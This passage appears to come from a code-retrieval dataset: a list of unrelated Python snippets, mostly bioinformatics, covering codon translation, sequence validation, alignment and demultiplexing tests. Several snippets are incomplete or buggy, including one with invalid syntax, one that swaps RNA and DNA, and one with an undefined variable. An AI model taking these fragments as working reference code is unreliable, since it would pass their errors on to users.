actual_output=coding_strand_to_AA(input_a)\n print 'Expected Output is ' + expected_output\n print 'Actual Output is ' +actual_output\n \n # YOUR IMPLEMENTATION HERE", "def aa(seq):\n global codontable\n seq = seq.upper()\n if codontable is None:\n # TODO: figure out the right place for the pre-computed information here\n bases = ['T', 'C', 'A', 'G']\n codons = [a+b+c for a in bases for b in bases for c in bases]\n codons = codons + list(map(lambda x: x.lower(), codons))\n amino_acids = 'FFLLSSSSYY**CC*WLLLLPPPPHHQQRRRRIIIMTTTTNNKKSSRRVVVVAAAADDEEGGGG'\n amino_acids = amino_acids + amino_acids.lower()\n codontable = dict(zip(codons, amino_acids))\n res = ''\n for i in range(0, len(seq) - 2, 3):\n res += codontable[seq[i:(i+3)]]\n return res", "def get_combo(un_lit):\n\n done_lit = []\n li_count = len(un_lit)\n\n for letter in un_lit: # for each letter in the provided\n placeholder = 0\n for num in range(li_count) # for each pos in list\n if letter.index == placeholder:\n temp_lit = \n\n elif letter.index > placeholder:\n \n elif letter.index < placeholder:\n\n done_lit.append(temp_lit)\n placeholder += 1", "def get_AA_subs(s):\r\n test_seq = s.toseq()[70:217].translate() #Translate the mutated region\r\n substitutions = []\r\n \r\n for i in range(len(test_seq)):\r\n if test_seq[i] != align_temp[i]:\r\n substitutions.append(''.join([str(align_temp[i]),\r\n str(i+48),\r\n str(test_seq[i]),\r\n ' ']))\r\n \r\n return ''.join(substitutions).strip()", "def do(s):\r\n return get_AA_subs(generate_mutString(s))", "def 
test_split_seq(self):\r\n seq = 'AAAACCCCCGTGTGTGT'\r\n barcode, primer, remainder = split_seq(seq, 4, 5)\r\n self.assertEqual(barcode, 'AAAA')\r\n self.assertEqual(primer, 'CCCCC')\r\n self.assertEqual(remainder, 'GTGTGTGT')", "def coding_strand_to_AA(dna):\n l = len(dna)\n res = []\n for i in range(0, l, 3):\n s = dna[i: i + 3]\n for j in range(len(codons)):\n# for codon in codons[j]:\n# if codon == s:\n# res.append(aa[j])\n# break;\n if s in codons[j]: # [WOW] Python is really nice unlike C, yay!!\n res.append(aa[j])\n return collapse(res)", "def test_constructPossibleSequenceRegex(self):\n test_cases = [\n ['file03.03.rgb', [r'file(\\d+).03.rgb', r'file03.(\\d+).rgb']],\n ['file3030.030', [r'file(\\d+).030', r'file3030.(\\d+)']],\n ]\n for x, (fileName, regexStrings) in enumerate(test_cases):\n with self.subTest(i=x):\n result = path_core._core.FolderContainer._constructPossibleSequenceRegex(fileName)\n expectedResult = [re.compile(regexString) for regexString in regexStrings]\n self.assertEqual(expectedResult, result)", "def multiple_choice():\n\n return [\"MAR\", \"MAR\", \"NI\", \"NI\", \"MCAR\"]", "def CheckSeq(Seq):\n OkNucleo = (\"A\", \"C\", \"G\", \"T\")\n for i in Seq:\n if i not in OkNucleo:\n raise InputError(Seq,\"malformed input\")", "def RNAorDNA ( seq ) :\n\tif dna_regex . search ( seq ):\n\t\treturn RNA ( seq )\n\n\tif rna_regex . search ( seq ):\n\t\treturn DNA ( seq )", "def test_possibilites(self):\n self.assertEqual(self.RNA(\"\").possibilities(), 1)\n self.assertEqual(self.RNA(\"ACGUgcaucagUCGuGCAU\").possibilities(), 1)\n self.assertEqual(self.RNA(\"N\").possibilities(), 4)\n self.assertEqual(self.RNA(\"R\").possibilities(), 2)\n self.assertEqual(self.RNA(\"H\").possibilities(), 3)\n self.assertEqual(self.RNA(\"nRh\").possibilities(), 24)\n self.assertEqual(\n self.RNA(\"AUGCnGUCAg-aurGauc--gauhcgauacgws\").possibilities(), 96\n )", "def test_build_sequence_multiple_values(self):\n # Test basic sequence rule\n r = Rule(schema={'type': 'seq', 'sequence': [{'type': 'str'}, {'type': 'int'}]})\n assert r.type == \"seq\"\n assert r.matching == \"any\"\n assert len(r.sequence) == 2\n assert isinstance(r.sequence, list)\n assert all(isinstance(r.sequence[i], Rule) for i in range(len(r.sequence)))\n assert r.sequence[0].type == \"str\"\n assert r.sequence[1].type == \"int\"\n\n # Test sequence without explicit type\n r = Rule(schema={'sequence': [{'type': 'str'}, {'type': 'int'}]})\n assert r.type == \"seq\"\n assert r.matching == \"any\"\n assert len(r.sequence) == 2\n assert isinstance(r.sequence, list)\n assert all(isinstance(r.sequence[i], Rule) for i in range(len(r.sequence)))\n assert r.sequence[0].type == \"str\"\n assert r.sequence[1].type == \"int\"\n\n # Test adding matchin rules", "def test_find_all_substrings_03():\n assert (U.find_all_substrings(s, 17, 17) ==\n U.find_all_substrings(s, 17, 18))\n s2 = ''.join([random.choice(s) for i in range(100)])\n assert (U.find_all_substrings(s2, 17, 17) ==\n U.find_all_substrings(s2, 17, 18))", "def test_find_all_substrings_01():\n assert (U.find_all_substrings(s, 17, 300) ==\n U.find_all_substrings(s, 17, 27))\n s2 = ''.join([random.choice(s) for i in range(100)])\n assert (U.find_all_substrings(s2, 17, 300) ==\n U.find_all_substrings(s2, 17, len(s2) + 1))", "def coding_strand_to_AA_unit_tests():\n print \"input: GTTGACAGTACGTACAGGGAA, \"+\"output: \"+coding_strand_to_AA(\"GTTGACAGTACGTACAGGGAA\")+\", actual output: VDSTYRE\"\n print \"input: TTATTGCTTATTATCATG, \"+\"output: 
\"+coding_strand_to_AA(\"TTATTGCTTATTATCATG\")+\", actual output: LLLIIM\"\n print \"input: TTTTTAATTATGGTTTCTCCTACTGCTTATTAACATCAAAATAAAGATGAATGTTGGCGTGGT, \"+\"output: \"+coding_strand_to_AA(\"TTTTTAATTATGGTTTCTCCTACTGCTTATTAACATCAAAATAAAGATGAATGTTGGCGTGGT\")+\", actual output: FLIMVSPTAY|HQNKDECWRG\"\n print \"input: TT, \" + \"output: \"+coding_strand_to_AA(\"TT\")+\", actual output: ERROR: The provided fragment is too short to contain any codons.\"", "def getSequence(resnames):\n\n get = AAMAP.get\n return ''.join([get(rn, 'X') for rn in resnames])", "def test_find_all_substrings_02():\n assert (U.find_all_substrings(s, 17, 5) ==\n U.find_all_substrings(s, 17, 18))\n s2 = ''.join([random.choice(s) for i in range(100)])\n assert (U.find_all_substrings(s2, 17, 5) ==\n U.find_all_substrings(s2, 17, 18))", "def main():\n\n args = get_args()\n seq = args.seq.upper()\n codon_to_aa = {\n 'AAA': 'K',\n 'AAC': 'N',\n 'AAG': 'K',\n 'AAU': 'N',\n 'ACA': 'T',\n 'ACC': 'T',\n 'ACG': 'T',\n 'ACU': 'T',\n 'AGA': 'R',\n 'AGC': 'S',\n 'AGG': 'R',\n 'AGU': 'S',\n 'AUA': 'I',\n 'AUC': 'I',\n 'AUG': 'M',\n 'AUU': 'I',\n 'CAA': 'Q',\n 'CAC': 'H',\n 'CAG': 'Q',\n 'CAU': 'H',\n 'CCA': 'P',\n 'CCC': 'P',\n 'CCG': 'P',\n 'CCU': 'P',\n 'CGA': 'R',\n 'CGC': 'R',\n 'CGG': 'R',\n 'CGU': 'R',\n 'CUA': 'L',\n 'CUC': 'L',\n 'CUG': 'L',\n 'CUU': 'L',\n 'GAA': 'E',\n 'GAC': 'D',\n 'GAG': 'E',\n 'GAU': 'D',\n 'GCA': 'A',\n 'GCC': 'A',\n 'GCG': 'A',\n 'GCU': 'A',\n 'GGA': 'G',\n 'GGC': 'G',\n 'GGG': 'G',\n 'GGU': 'G',\n 'GUA': 'V',\n 'GUC': 'V',\n 'GUG': 'V',\n 'GUU': 'V',\n 'UAA': 'Stop',\n 'UAC': 'Y',\n 'UAG': 'Stop',\n 'UAU': 'Y',\n 'UCA': 'S',\n 'UCC': 'S',\n 'UCG': 'S',\n 'UCU': 'S',\n 'UGA': 'Stop',\n 'UGC': 'C',\n 'UGG': 'W',\n 'UGU': 'C',\n 'UUA': 'L',\n 'UUC': 'F',\n 'UUG': 'L',\n 'UUU': 'F',\n }\n\n k = 3\n\n # 1: for loop\n # protein = ''\n # for codon in [seq[i:i + k] for i in range(0, len(seq), k)]:\n # aa = codon_to_aa.get(codon, '-')\n # if aa == 'Stop':\n # break\n # protein += aa\n\n # 2: list comprehension, slice to remove Stop\n # codons = [seq[i:i + k] for i in range(0, len(seq), k)]\n # aa = [codon_to_aa.get(codon, '-') for codon in codons]\n # if 'Stop' in aa:\n # aa = aa[:aa.index('Stop')]\n # print(''.join(aa))\n\n # 3: L.C. 
-> map(), slice -> takewhile\n # codons = map(lambda i: seq[i:i + k], range(0, len(seq), k))\n # aa = map(lambda codon: codon_to_aa.get(codon, '-'), codons)\n # print(''.join(takewhile(lambda c: c != 'Stop', aa)))\n\n # 4: combine map()\n # aa = map(lambda c: codon_to_aa.get(c, '-'),\n # map(lambda i: seq[i:i + k], range(0, len(seq), k)))\n # print(''.join(takewhile(lambda c: c != 'Stop', aa)))\n\n # 5: combine all\n # print(''.join(\n # takewhile(\n # lambda c: c != 'Stop',\n # map(lambda c: codon_to_aa.get(c, '-'),\n # map(lambda i: seq[i:i + k], range(0, len(seq), k))))))\n\n # 6: Seq\n print(str(Seq(args.seq).translate()).replace('*', ''))", "def generate_test_strings(nr_strings, alphabet, length):\n for _ in range(0, nr_strings):\n yield rng_string(alphabet, randint(0, length))", "def get_basic_case_combos(str):\n return (str, str.lower(), str.upper(), str.capitalize())", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n 
self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def question1a(s,t):\n\n anagrams = permutations(t, len(t))\n for anagram in anagrams:\n if anagram:\n if ''.join(anagram) in s:\n return True\n return False", "def make_seq(scaffold, o_dict):\n scaff_name = scaffold[0]\n sequence = []\n \n nice_scaff = \"contigs__\"\n \n scaff_string = str(scaffold)\n while scaffold:\n \n if len(scaffold) == 1:\n #This should never happen!\n paf(\"\\nWARNING: odd number of elements in scaffold!\")\n paf(\"scaffold is: \" + scaff_string)\n nice_scaff += \"WARNING:_odd_number_of_elements_in_scaffold!\"\n sequence.description = scaff_name\n return sequence, nice_scaff\n\n end1 = scaffold.pop(0)\n end2 = scaffold.pop(0)\n \n if end1[0:4] != \"five\" and end1[0:5] != \"three\":\n if end2 in repeat_contigs and end2[0:10] == \"threeprime\":\n #Only attach a repeat if connected by fiveprime end,\n # to avoid creating duplicate copies\n ''' this condition has been removed!\n end1 = scaffold.pop(0)\n end2 = scaffold.pop(0)\n #threeprime ends of repeats are not attached\n if end2[0:4] != \"five\" and end2[0:5] != \"three\": end2 = other_end(end1)\n '''\n \n if \"dummy\" in end2:\n end1 = scaffold.pop(0)\n end2 = scaffold.pop(0)\n\n if end2[0:4] != \"five\" and end2[0:5] != \"three\":\n #This should never happen! \n paf(\"\\nWARNING: scaffold not included in assembly!\")\n paf(\"scaffold is: \" + scaff_string)\n paf(\"end1 is: \" + str(end1))\n paf(\"end2 is: \" + str(end2)+ \"\\n\")\n nice_scaff += \"scaffold.not.included.in.assembly!\" + str(end1) + \".\" + str(end2)\n sequence.description = scaff_name\n return sequence, nice_scaff\n else:\n sequence, nice_scaff = initiate_seq(end2, nice_scaff)\n elif (end2 != \"link_circular\") and (\"dummy\" not in end1):\n sequence, nice_scaff = extend_seq(sequence, end0, end1, o_dict, nice_scaff)\n end0 = end2\n \n sequence.description = scaff_name\n \n return sequence, nice_scaff", "def match_all_cui(s,max_len = 10, Eterm_cui = Eterm_cui):\n if len(s) == 0: \n return []\n sub_label = np.zeros(len(s),dtype = 'int')\n location_term = {}\n i = 0\n while i < len(s):\n for j in range(max_len+1,0,-1):\n temp = ' '.join(s[i:i+j])\n if temp in Eterm_cui:\n sub_label[i:i+j] = 1\n location_term[i] = [Eterm_cui[temp]]\n break#matched maximum string, so break\n i += j\n output = []\n for i in range(len(s)):\n if sub_label[i] == 0:#no match\n output += [s[i]]\n elif i in location_term:\n for cui in location_term[i][: :-1]:\n output += [cui]\n return output", "def isAnchor(context, seen_strings, seen_consts, functions_list, logger):\n case = 1\n max_case = 5\n while case <= max_case:\n # 1. Huge unique string\n if case == 1:\n huge_strings = filter(lambda x: seen_strings.count(x) == 1, filter(lambda x: len(x) >= STRING_HUGE_LIMIT, context.strings))\n if len(huge_strings) >= STRING_HUGE_GROUP:\n logger.debug(\"Found an Anchor: %s ==> Unique HUGE string (%d)\", context.name, len(huge_strings[0]))\n return True, STRING_HUGE_GROUP, huge_strings\n # 2. 
Unique string with a function name in it\n elif case == 2:\n for unique_str in filter(lambda x: seen_strings.count(x) == 1, context.strings):\n for func_name in functions_list:\n if func_name in unique_str:\n logger.debug(\"Found an Anchor: %s ==> Unique string (%s) containing a function name (%s)\", context.name, unique_str, func_name)\n return True, 1, [unique_str]\n # 3. X unique strings with long length\n elif case == 3:\n unique_long_strings = filter(lambda x: seen_strings.count(x) == 1, filter(lambda x: len(x) >= STRING_LONG_LIMIT, context.strings))\n if len(unique_long_strings) >= STRING_LONG_GROUP:\n logger.debug(\"Found an Anchor: %s ==> %d unique long strings\", context.name, len(unique_long_strings))\n return True, STRING_LONG_GROUP, unique_long_strings\n # 4. X unique strings with medium length\n elif case == 4:\n unique_medium_strings = filter(lambda x: seen_strings.count(x) == 1, filter(lambda x: len(x) >= STRING_MEDIUM_LIMIT, context.strings))\n if len(unique_medium_strings) >= STRING_MEDIUM_GROUP:\n logger.debug(\"Found an Anchor: %s ==> %d unique medium strings\", context.name, len(unique_medium_strings))\n return True, STRING_MEDIUM_GROUP, unique_medium_strings\n # 5. Unique const with high entropy\n elif case == 5:\n unique_complex_consts = filter(lambda x: seen_consts.count(x) == 1, filter(lambda x: rankConst(x, context) >= CONST_COMPLEX_LIMIT, context.consts))\n if len(unique_complex_consts) >= CONST_COMPLEX_GROUP:\n logger.debug(\"Found an Anchor: %s ==> %d unique complex consts: %s\", context.name, len(unique_complex_consts), hex(unique_complex_consts[0]))\n return False, CONST_COMPLEX_GROUP, unique_complex_consts\n case += 1\n # we found nothing if we reached this line\n return False, 0, None", "def seq_align(string1,string2,mismatch_penalty,gap_penalty):\n\n # define 2x2 matrix\n matrix = []\n for i in range(len(string1)+1):\n if i == 0:\n matrix.append(list([gap_penalty * x for x in range(len(string2)+1)]))\n else:\n matrix.append(list([gap_penalty * i if x == 0 else None for x in range(len(string2)+1)]))\n\n # populate matrix by looping through the strings and finding optimal value for each spot\n for i in range(len(string1)):\n for j in range(len(string2)):\n if string1[i] == string2[j]:\n val1 = 0 + matrix[i][j]\n else:\n val1 = mismatch_penalty + matrix[i][j]\n val2 = gap_penalty + matrix[i][j+1]\n val3 = gap_penalty + matrix[i+1][j]\n min_val = min(val1,val2,val3)\n matrix[i+1][j+1] = min_val\n\n\n # define values to use while retracing\n result_str1 = ''\n result_str2 = ''\n i = len(matrix)-1\n j = len(matrix[0])-1\n\n # trace through matrix to find the optimal character alignment\n while i > 0 and j > 0:\n val1 = matrix[i-1][j-1]\n val2 = matrix[i-1][j]\n val3 = matrix[i][j-1]\n min_val = min(val1,val2,val3)\n if val1 == min_val:\n result_str1 += string1[i-1]\n result_str2 += string2[j-1]\n i -= 1\n j -= 1\n elif val2 == min_val:\n result_str1 += \"-\"\n result_str2 += string2[j-1]\n i -= 1\n else:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n j -= 1\n\n # for any leftover j values\n if i == 0:\n while j > 0:\n result_str1 += '-'\n result_str2 += string2[j]\n j -=1\n\n # for any leftover i values\n if j == 0:\n while i > 0:\n result_str1 += string1[i]\n result_str2 += \"-\"\n i -= 1\n\n return matrix[len(matrix)-1][len(matrix[0])-1], result_str1[::-1], result_str2[::-1]", "def programmer_subsequence(s):\n\n # Base case. 
Remove all instances where programmer repeats\n s = s.replace('programmerprogrammer', '')\n\n template = {\n 'p': 0,\n 'r': 0,\n 'o': 0,\n 'g': 0,\n 'a': 0,\n 'm': 0,\n 'e': 0\n }\n\n matches = [] # Tuple of start and ends\n i= 0\n P_LENGTH = 9 # Length of the word 'programmer'\n\n k = P_LENGTH # Temp\n while i + k < len(s):\n # Make substring\n sub_s = s[i:i + k]\n\n copy_t = deepcopy(template)\n # Check to see if all chars are contained within string\n for j in range(len(sub_s)):\n if sub_s[j] in ['r', 'm']:\n copy_t[sub_s[j]] += 1 if copy_t[sub_s[j]] < 2 else copy_t[sub_s[j]]\n elif sub_s[j] in copy_t:\n copy_t[sub_s[j]] = 1 \n\n # If we have all values, then inceremnt count and check the next P_LENGTH string\n if sum(copy_t.values()) == P_LENGTH:\n matches.append((i, k))\n i += P_LENGTH\n j = P_LENGTH # Reset J\n else:\n k += 1\n\n return len(matches)", "def coding_strand_to_AA_unit_tests():\n # list of [input, expected output]\n data_list = [\n # pass cases\n [\"ATGCGA\", \"MR\"],\n [\"ATGCCCGCTTT\", \"MPA\"],\n [\"AAA\", \"K\"],\n [\"TTT\", \"F\"],\n [\"CCC\", \"P\"],\n [\"GGG\", \"G\"],\n [\"AAAA\", \"K\"],\n [\"AAAAA\", \"K\"],\n [\"AAAAAA\", \"KK\"],\n [\"CTAGAGTCT\", \"LES\"],\n [\"TTCCTCATCCCG\", \"FLIP\"],\n [\"GGTGGA\", \"GG\"],\n [\"TGAACCCGTAACGCACCTTGG\", \"|TRNAPW\"],\n [\"AGGGCCATTAAT\", \"RAIN\"],\n [\"CCGGAGCCTAGTATA\", \"PEPSI\"],\n ]\n for data in data_list:\n if len(data) == 2:\n print \"input: \" + str(data[0]) + \",\" ,\n print \"expected output: \" + str(data[1]) + \",\",\n o = coding_strand_to_AA(data[0])\n print \"actual output: \" + str(o)\n if o != data[1]:\n print \"## Test Fail Here!\"", "def test_match_can_find_longer_sequences_starting_at_beginning_of_string(self):\n first_three_letters = \"abc\"\n s = \"abcdef\"\n self.assertEqual(__, re.match(first_three_letters, s).group())", "def Ab_seq(RNs):\n seq = []\n for res in range(cf.nkey):\n randi = RNs.getR()\n for i in range(20):\n if randi < cf.cumprob20[i]:\n seq.append(i + 1) # want amino acids between 1 and 20\n break\n return seq", "def solve(chars, length):\n return generate_greedy(generate_string_list(length, chars))", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq, in_frame=False), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_libs_from_seqids(self):\r\n seqids = ['ABC_001', 'DEF_002', 'ABC_003', 'GHI_JKL_001']\r\n self.assertEqual(libs_from_seqids(seqids),\r\n set(['ABC', 'DEF', 'GHI_JKL']))", "def coding_strand_to_AA(dna):\n amino_acid=\"\"\n for i in range(0, len(dna), 3):\n mycodon=dna[i:i+3]\n # print'this is my codon'\n #print mycodon\n for j in range(len(codons)):\n for k in range(len(codons[j])):\n #print codons[j][k]\n if codons[j][k] == mycodon:\n #print aa[j]\n amino_acid += aa[j]\n return amino_acid\n \n #step uno break apart string into groups of three\n #find sequence +find index\n #then connect to amino acids ", "def test_assign_seqs_two_fastas_quals(self):\r\n\r\n # Handles single fasta and single qual\r\n file_data = {}\r\n file_data['fasta_files'] = [self.valid_fasta_file_no_errors,\r\n self.valid_fasta_file_no_errors]\r\n file_data['qual_files'] = [self.valid_qual_file_no_errors,\r\n self.valid_qual_file_no_errors]\r\n file_data['demultiplexed_seqs_f'] = FakeOutFile()\r\n file_data['demultiplexed_qual_f'] = FakeOutFile()\r\n\r\n 
ids_bcs_added_field = {('AACTCGTCGATG', ''): 's1',\r\n ('AGCAGCACTTGT', ''): 's2', ('ACCGCAGAGTCA', ''): 's3'}\r\n bc_lens = [12]\r\n all_bcs = ['AACTCGTCGATG', 'AGCAGCACTTGT', 'ACCGCAGAGTCA']\r\n keep_barcode = False\r\n barcode_type = \"golay_12\"\r\n max_bc_errors = 1.5\r\n start_index = 1\r\n write_unassigned_reads = False\r\n disable_bc_correction = False\r\n added_demultiplex_field = None\r\n\r\n log_data, bc_freqs, seq_counts, corrected_bc_count =\\\r\n assign_seqs(file_data, ids_bcs_added_field, bc_lens, all_bcs,\r\n keep_barcode, barcode_type, max_bc_errors, start_index,\r\n write_unassigned_reads, disable_bc_correction,\r\n added_demultiplex_field)\r\n\r\n expected_demultiplexed_fasta_seq = '>s1_1 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\nCAGGACGAGACGAGGTT\\n>s3_2 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\nCCAGATTACGAGATTA\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\nGACCGATTACGATAACG\\n>s1_4 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\nCAGGACGAGACGAGGTT\\n>s3_5 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\nCCAGATTACGAGATTA\\n>s2_6 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\nGACCGATTACGATAACG\\n'\r\n expected_demultiplexed_qual_seq = '>s1_1 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\n30 26 11 11 29 20 19 16 24 17 29 28 11 27 14 24 24\\n>s3_2 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\n12 14 27 23 22 19 24 18 19 20 28 10 17 14 17 13\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\n10 20 16 20 25 27 22 28 16 22 16 18 12 13 16 25 17\\n>s1_4 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\n30 26 11 11 29 20 19 16 24 17 29 28 11 27 14 24 24\\n>s3_5 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\n12 14 27 23 22 19 24 18 19 20 28 10 17 14 17 13\\n>s2_6 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\n10 20 16 20 25 27 22 28 16 22 16 18 12 13 16 25 17\\n'\r\n self.assertEqual(file_data['demultiplexed_seqs_f'].data,\r\n expected_demultiplexed_fasta_seq)\r\n self.assertEqual(file_data['demultiplexed_qual_f'].data,\r\n expected_demultiplexed_qual_seq)\r\n\r\n expected_log_data = {'ACCGCAGAGTCA,s3': 2, 'AACTCGTCGATG,s1': 2,\r\n 'AGCAGCACTTGT,s2': 2}\r\n expected_bc_freqs = {'AACTCGTCGATG': 2, 'AGCAGCACTTGT': 2,\r\n 'ACCGCAGAGTCA': 2}\r\n expected_seq_counts = 6\r\n expected_corrected_bc_count = [0, 0]\r\n\r\n self.assertEqual(log_data, expected_log_data)\r\n self.assertEqual(bc_freqs, expected_bc_freqs)\r\n self.assertEqual(seq_counts, expected_seq_counts)\r\n self.assertEqual(corrected_bc_count, expected_corrected_bc_count)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.inframe_cds_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq, in_frame=False), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_check_fasta_seqs_all_valid(self):\r\n\r\n # Test against all valid data\r\n\r\n sample_barcodes = set(['ACCATACC', 'CCAGATTACG'])\r\n sample_primers = set(['ACATTATTTT', 'TTATTACCGAT'])\r\n total_seq_count = 3\r\n\r\n perc_invalid_chars, perc_barcodes_detected, perc_primers_detected,\\\r\n perc_bcs_seq_start =\\\r\n check_fasta_seqs(self.sample_fasta_fp, sample_barcodes,\r\n sample_primers, total_seq_count)\r\n\r\n 
expected_perc_invalid_chars = \"%1.3f\" % 0\r\n expected_perc_barcodes_detected = \"%1.3f\" % 0\r\n expected_perc_primers_detected = \"%1.3f\" % 0\r\n\r\n self.assertEqual(perc_invalid_chars, expected_perc_invalid_chars)\r\n self.assertEqual(perc_barcodes_detected,\r\n expected_perc_barcodes_detected)\r\n self.assertEqual(perc_primers_detected,\r\n expected_perc_primers_detected)", "def __init__(self, length, alphabet=IUPAC.unambiguous_dna):\n seq_str = self.SampleLetters(alphabet.letters, length)\n \n Seq.__init__(self, seq_str.upper(), alphabet)", "def generateSubSequences(k, ch):\n seq = [\"\".join(c) for c in itertools.product(ch, repeat = k)]\n# discussion about the best way to do this:\n# https://stackoverflow.com/questions/7074051/what-is-the-best-way-to-generate-all-possible-three-letter-strings\n return seq", "def make_text(chains):\n words = []\n not_end_of_list = True\n # your code goes here\n \n # starts with a capital lettered word from source text\n capitalized_ngrams = []\n for key in chains.keys():\n # check if the first tuple in key[0][0]\n if key[0][0].isupper():\n capitalized_ngrams.append(key)\n \n \n\n selected_keys = list(capitalized_ngrams)\n count = 0\n while not_end_of_list:\n choice_n = choice(selected_keys)\n\n if count == 0:\n words.extend(choice_n)\n \n if chains[choice_n] and count <= 150:\n # as long as there is an option, picks a random element from dict list\n choose_next = choice(chains[choice_n])\n # adds new word to list\n words.append(choose_next)\n # creates a list of keys whose last item in tuple is item from list\n selected_keys = [x for x in chains.keys() if x == tuple([*choice_n[1:], choose_next])]\n # it is possible continues\n if selected_keys:\n pass\n else:\n not_end_of_list = False\n\n count += 1\n \n else:\n not_end_of_list = False\n\n return \" \".join(words)", "def show(seq, alphabet):\n for a in seq:\n if a in alphabet:\n alphabet[a]()", "def compare_multiple_seqs(self):\n import tkMessageBox\n if self.data['DNAseq']=='' or not self.data['DNAseq']:\n tkMessageBox.showwarning(\n \"Compare DNA Sequence\",\n \"Load a DNA sequence first\\nUse the Browse Button\"\n )\n return\n else:\n self.show_comp_sequence.set(1)\n import DNA_sequencing\n if not self.sequ_win:\n #print self,'inDNAtool'\n self.sequ_win=DNA_sequencing.sequencing_window(self)\n self.sequ_win.show_multiple_DNAseq_dialog()\n #self.wait_window(self.sequ_win.si_window)\n return", "def run_example3():\r\n # example for digits\r\n #outcomes = [0, 1, 2, 3]\r\n #outcomes = set([\"Red\", \"Green\", \"Blue\"])\r\n outcomes = [\"Sunday\", \"Mondy\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\r\n \r\n length = len(outcomes)\r\n seq_outcomes = gen_permutations_re(outcomes)\r\n print \"Computed\", len(seq_outcomes), \"sorted sequences of\", str(length) ,\"outcomes\"\r\n #print \"Sequences were\", seq_outcomes\r", "def test_solver(allowed_symbols, len_sequence=3):\n secret_sequence = \"\"\n for _ in range(len_sequence):\n secret_sequence += allowed_symbols[random.randint(0, len_sequence - 1)]\n print('secret:', secret_sequence)\n\n solution = brute_force_solver(allowed_symbols, secret_sequence)\n return solution == tuple(secret_sequence)", "def solution(s):", "def validate_seq(sequence):\n sequence = sequence.strip()\n sequence = sequence.replace(\" \", \"\")\n sequence.upper()\n regex = re.compile('^[ACTGNRYSWKMBDHVEFILPQSXZ]*$', re.I)\n if 